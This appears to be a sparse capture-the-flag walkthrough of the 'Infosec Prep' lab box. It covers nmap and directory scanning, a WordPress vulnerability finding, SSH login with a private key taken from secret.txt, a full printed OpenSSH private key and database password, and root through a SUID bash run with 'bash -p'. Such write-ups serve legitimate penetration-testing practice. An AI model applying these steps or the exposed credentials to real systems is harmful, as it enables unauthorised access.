Infosec Prep
Nmap 192.168.130.89
22/tcp open ssh syn-ack OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 91:ba:0d:d4:39:05:e3:13:55:57:8f:1b:46:90:db:e4 (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDTlNTlvI4qQLNU17b70iKB5xuJlNnZ3zMZeHzfG3H5TcsVNmgImTe4FjEez0e4lKqJvTMsxrPVFHTq6gqfYHwN0KN34x0dv0ngrc+wrrWNoHQrQQqeFuTZy0Tt6BY97082YpFvZfDAvAwJoutkyCxeBb1+C9Y7g6kQYXlNFOuHoq/2m6vki9yVW7Bu3IVeLryw/7pnwzb/tr3K86GEsGc8+87ZIyFrgE1Rca/Y1hD03Uk0s/Kpmi3hCybJwPIoB1WmO2Xz2US8xqzuefsX6UzRazFTQKlTCq5gTTkpNE5fJzS/WmvK7w79aoFJPmVBCXOSXkoe9uoi9a64OnsY0jF8ao7uOUJp84QIUyPRLuPXqlxXwZenqt5RKH6dXyw9tsV2Q3BvZwJwvStFjiQFIi2zIp5jmVcYxwqV4CTt7Ev0ybATE00YAfCoS5i2LJR+fquN9XkS4ay3p9qoZZW7Q4uujWfUUaSO/gYLiOTpbTOl4Smgzc+NvqFrUk1OxPttDSc=
| 256 0f:35:d1:a1:31:f2:f6:aa:75:e8:17:01:e7:1e:d1:d5 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBOX6nl2HC2/Prh0l8uVsnAzinDT2+rhj1VasPM8Df3ntzgb8XzQat7zC/nHm0v7yLWo/CjpI6pD+mrBh3P/wuqk=
| 256 af:f1:53:ea:7b:4d:d7:fa:d8:de:0d:f2:28:fc:86:d7 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIBefJyPm1sjN+QedhTj6S1CPbXQZEFXb58RICJh970R8
80/tcp open http syn-ack Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: OSCP Voucher – Just another WordPress site
| http-robots.txt: 1 disallowed entry
|_/secret.txt
|_http-generator: WordPress 5.4.2
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
secrets found
This was ssh private key
[18:45:23] 301 - 0B - /index.php -> http://secprep/
[18:45:24] 301 - 307B - /javascript -> http://secprep/javascript/
[18:45:24] 200 - 19KB - /license.txt
[18:45:31] 200 - 7KB - /readme.html
[18:45:32] 200 - 36B - /robots.txt
[18:45:38] 301 - 305B - /wp-admin -> http://secprep/wp-admin/
[18:45:38] 302 - 0B - /wp-admin/ -> http://192.168.130.89/wp-login.php?redirect_to=http%3A%2F%2Fsecprep%2Fwp-admin%2F&reauth=1
[18:45:38] 200 - 0B - /wp-config.php
[18:45:39] 301 - 307B - /wp-content -> http://secprep/wp-content/
[18:45:39] 200 - 1KB - /wp-admin/install.php
[18:45:39] 200 - 0B - /wp-content/
[18:45:39] 200 - 69B - /wp-content/plugins/akismet/akismet.php
[18:45:39] 301 - 308B - /wp-includes -> http://secprep/wp-includes/
[18:45:39] 200 - 0B - /wp-cron.php
[18:45:39] 200 - 5KB - /wp-login.php
[18:45:39] 302 - 0B - /wp-signup.php -> http://192.168.130.89/wp-login.php?action=register
[18:45:39] 200 - 45KB - /wp-includes/
[18:45:39] 405 - 42B - /xmlrpc.php
<rss version="2.0">
<channel>
<title> Comments for OSCP Voucher </title>
<atom:link href="http://192.168.130.89/index.php/comments/feed/" rel="self" type="application/rss+xml"/>
<link>http://192.168.130.89</link>
<description>Just another WordPress site</description>
<lastBuildDate>Thu, 09 Jul 2020 06:12:49 +0000</lastBuildDate>
<sy:updatePeriod> hourly </sy:updatePeriod>
<sy:updateFrequency> 1 </sy:updateFrequency>
<generator>https://wordpress.org/?v=5.4.2</generator>
<item>
<title>
</title>
<link>
http://192.168.130.89/index.php/2020/07/09/hello-world/#comment-1
</link>
<dc:creator>A WordPress Commenter</dc:creator>
<pubDate>Thu, 09 Jul 2020 06:12:49 +0000</pubDate>
<guid isPermaLink="false">http://192.168.128.135/?p=1#comment-1</guid>
<description>
</description>
<content:encoded>
<p>Hi, this is a comment.<br /> To get started with moderating, editing, and deleting comments, please visit the Comments screen in the dashboard.<br /> Commenter avatars come from <a href="https://gravatar.com">Gravatar</a>.</p>
</content:encoded>
</item>
</channel>
</rss>
[!] Title: WordPress < 5.8.3 - SQL Injection via WP_Query
| Fixed in: 5.4.9
| References:
| - https://wpscan.com/vulnerability/7f768bcf-ed33-4b22-b432-d1e7f95c1317
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-21661
| - https://github.com/WordPress/wordpress-develop/security/advisories/GHSA-6676-cqfm-gw84
| - https://hackerone.com/reports/1378209
|
logged in to ssh with the private key with ssh -i id_rsa to the oscp account
Priv Esc
╔══════════╣ Analyzing Wordpress Files (limit 70) -rw-r--r-- 1 root root 2381 Dec 27 2019 /usr/share/wordpress/wp-config.php $debian_server = preg_replace('/:.*/', "", $_SERVER['HTTP_HOST']); if (!defined('DB_NAME')) define('DB_NAME', 'wordpress'); if (!defined('DB_USER')) define('DB_USER', 'wordpress'); if (!defined('DB_HOST')) define('DB_HOST', 'localhost'); -rw-r--r-- 1 root root 2897 Jul 9 2020 /var/www/html/wp-config.php define( 'DB_NAME', 'wordpress' ); define( 'DB_USER', 'wordpress' ); define( 'DB_PASSWORD', 'Oscp12345!' ); define( 'DB_HOST', 'localhost' );
-rw------- 1 oscp oscp 2590 Jul 9 2020 /home/oscp/.ssh/id_rsa
-----BEGIN OPENSSH PRIVATE KEY-----
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
8nfK2oDc6LfrDmjQAAAAlvc2NwQG9zY3A=
-----END OPENSSH PRIVATE KEY-----
-rw-r--r-- 1 oscp oscp 563 Jul 9 2020 /home/oscp/.ssh/id_rsa.pub
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQC0cKxLMe1QXwry2I6oQJBgusoqsJGxu+rqIgbtH2DRY+/3D6CRRZ4jMFJy+CUsT1+WiWwp3F8xBBsxUapIAOdgFNq9qKBB6S57RsuxiT+tnkWE5RFktO92UlbHNsh7ILlrkXQOX1RibMKF7jfPQOjSJDDXvwYlRBqqxwuYRq2oiJP/YWQX4C95beGo99uvD28D1AAhQDeV52qvxcTNj/8urT6xCD+lS7Qo+RjXyLq+d+JgcaTJbVKCvI+HnH0EZOTd5Fhw3DqYNsCNcooIcYz52ecY2C8CSpP6BlbP8ynLR6Rq6To0/s0LM5E2shcBgVrWtbNoS3KkfBiQIRx9YkmVnv59wQVrkHuATC39op0VFc9DCKcWWJAxgyZq7w9ls+IEivG0hhfLcwdwoEiwnQdIq/4dspb2SlMvk6gCQHx8cXfS6NU5vphO5zWwkpZEchljep7TwjZFd4TEUVi72gu6DR20dh0kcUvtxaI2/iZHIn1FyuFUvVXcJrM1korCtpE= oscp@oscp
SUID
-rwsr-sr-x 1 root root 1.2M Feb 25 2020 /usr/bin/bash
I was running /bash & /usr/bin/bash
but all I had to do was /bin/bash -p
/usr/bin/bash -p worked too
Last updated
